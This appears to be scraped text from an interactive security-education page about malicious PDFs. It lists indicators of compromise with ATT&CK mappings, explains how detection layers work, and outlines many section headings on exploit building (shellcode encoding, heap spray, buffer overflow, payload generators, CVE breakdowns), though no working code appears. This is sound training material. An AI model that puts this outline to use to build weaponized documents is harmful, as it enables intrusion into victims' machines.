/OpenAction or /AA Present

Auto-execute on open = zero-click. The PDF does something the instant it's rendered, before the user interacts.

T1203 — Exploitation for Client Execution

/Launch Action

Can directly invoke system commands. A PDF calling cmd.exe or powershell.exe is a definitive IOC.

T1059 — Command and Scripting Interpreter

Embedded Files

/EmbeddedFile streams containing executables, scripts, or Office documents with macros — payload delivery inside the PDF.

T1027.006 — Obfuscated Files: HTML Smuggling

Heavy Stream Encoding

Multiple filter chains (FlateDecode + ASCIIHexDecode + ASCII85Decode) stacked to hide content from static scanners.

T1027 — Obfuscated Files or Information

URL Shorteners / Redirects

Links going through bit.ly, tinyurl, or multi-hop redirects to obscure the final destination. Legitimate invoices use direct corporate URLs.

T1608.005 — Link Target

Unexpected Attachment

Did the recipient expect this invoice? Unsolicited financial documents are the most common phishing vector in enterprise environments.

T1566.001 — Spearphishing Attachment

🛡 How Security Tools Detect Malicious PDFs

Understanding detection helps you appreciate both sides — what attackers try to evade and what defenders rely on. Here's how each layer of the security stack handles PDF threats.

📧 Email Gateway (Layer 1)

Static Analysis: Scans PDF structure for /JavaScript, /Launch, /OpenAction, /EmbeddedFile keywords. Your lab PDF passes this — it only has /URI.

URL Reputation: Extracts all URLs and checks against threat intel feeds. A link to putty.org is clean; a link to putty-secure[.]download would be flagged.

Sandbox Detonation: Opens the PDF in a headless VM, watches for process spawning, network callbacks, file drops. Your PDF just renders text — nothing detonates.

🖥 EDR / Endpoint (Layer 2)

Process Chain: Monitors if PDF reader spawns child processes (cmd.exe, powershell.exe, mshta.exe). Your PDF opens a browser — normal behavior for URI clicks.

Behavioral Rules: YARA rules flag PDFs calling WinExec, ShellExecute, or containing ROP gadgets. Your PDF has none of these.

Memory Scanning: Detects heap sprays (NOP sleds in streams), shellcode patterns, and exploit signatures at runtime.

🔍 Analyst Tools (Layer 3)

pdfid.py: Quick triage — counts suspicious keywords. Zero /JS, /Launch, /OpenAction = low risk. Try it on your generated PDF!

pdf-parser.py: Deep dive — dumps every object, decodes streams, follows references. Shows the full object tree.

peepdf: Interactive analysis — JavaScript extraction, shellcode detection, object graph visualization.

Online Sandboxes: Upload to any.run, hybrid-analysis.com, or VirusTotal to see multi-engine detection results.

⚡ Why Your PDF Passes All Checks

No executable code: Zero JavaScript, no embedded executables, no launch actions.

Transparent link: A visible /URI pointing to a known-good domain. Users choose to click; nothing auto-executes.

Clean structure: Minimal PDF objects — page, font, text streams, one annotation. No obfuscation, no encoded streams hiding payloads.

Social engineering only: The "attack" is the convincing design and the call-to-action. This is why human awareness training is essential — technology can't flag a well-crafted invoice with a legitimate link.

🎯 Key Takeaway — Your lab PDF proves that a benign document can be extremely convincing. The difference between this and a real attack is structural — adding /JavaScript, /Launch, or /OpenAction entries turns a normal PDF into a weapon. Security tools focus on these structural markers, but social engineering with clean documents remains the hardest attack to detect. This is why user training, not just technology, is critical.

What Are Exploits?

One-Click Exploits

Zero-Click Exploits

Document Exploits

Exploit Chains

Calculations Behind Every Exploit

Hexadecimal — The Hacker's Number System

The Buffer Overflow — Calculated Byte by Byte

The Vulnerable C Code — Where the Bug Lives

The Exploit Tool — Python Precision

Converting a URL to Shellcode Hex

Heap Spray — The Memory Math

PDF Structure — Object Numbers & Cross-Reference Math

🔢 Exploit Math Calculator — Try It Live

From Document to Full Compromise

Invisible Intrusions

How They Work — The Technical Flow

Notable Zero-Click Attacks — Case Studies

WhatsApp VoIP — CVE-2019-3568

Samsung Qmage — CVE-2020-8899

FORCEDENTRY — CVE-2021-30860

BLASTPASS — CVE-2023-41064

Weaponized Documents

The Major Attack Surfaces

VBA Macros

OLE Objects

Remote Templates

DDE / Field Codes

Equation Editor (CVE-2017-11882)

Follina (CVE-2022-30190)

MotW Bypass (ISO/IMG Containers)

OneNote Attacks (.one Files)

Document Exploit: Anatomy — The Full Attack Flow

Follina Deep Dive (CVE-2022-30190) — Complete Technical Breakdown

Inside a PDF Exploit

Clean vs. Exploited — Raw "Notepad" View

How Each Exploit Type Works Internally

PDF JavaScript Execution

Heap Spraying — Filling Memory with Malice

Before the Spray — Normal Memory Layout

After the Spray — Attacker Controls the Heap

RTF (Rich Text Format) Exploits

OLE Object Embedding

PDF Exploit Lifecycle — From Open to Owned

The Complete Weaponized PDF — Annotated Line by Line

The JavaScript Heap Spray — Step by Step

🔬 Exploit Workshop — Build Every Component Step by Step

📊 Stack Memory — Before vs After Overflow

📝 Before vs After — How This Tag Changed the PDF

🔐 Encoded / Obfuscated Version (what hackers actually embed)

🏷️ All Generated Malicious Tags (for reference / checking)

🧮 The Math — Byte Offset Calculations

👁️ What The User Sees — Both PDFs Rendered

INVOICE #2024-0582

INVOICE #2024-0582

INVOICE #2024-0582

INVOICE #2024-0582

🕵️ What The Hacker Actually Wrote — the real code hidden inside your "invoice"

⚡ Generated Exploit Code — Full Chain

🏷️ Injected Techniques

How Attackers Build an Exploit

Write the Shellcode in Assembly x86 ASM

Assemble to Machine Opcodes Opcodes

Encode as Hex / URL / Unicode Encoding

🔄 Try It: Hex Encoder — Build a Payload and See It Inside a PDF

📄 Live Preview: How Encoded Data Appears Inside a PDF

Craft the Overflow — Junk + EIP + NOP + Shellcode Overflow

The Stack Before Overflow

The Stack After Overflow (Attacker's Payload)

Assemble the Full Payload Python

Inject Payload into a PDF Document Python PDF

Victim Opens the PDF — The Kill Chain Execution

The Complete Exploit Buffer — Annotated

🔧 Interactive: Full Pipeline Generator

📐 Modern Exploitation: 64-bit & Mitigation Bypasses

Notable Exploit CVEs

Detailed CVE Breakdowns

CVE-2017-0199 — HTA Handler (Microsoft Office)

CVE-2017-11882 — Equation Editor Buffer Overflow

CVE-2019-3568 — WhatsApp VoIP Buffer Overflow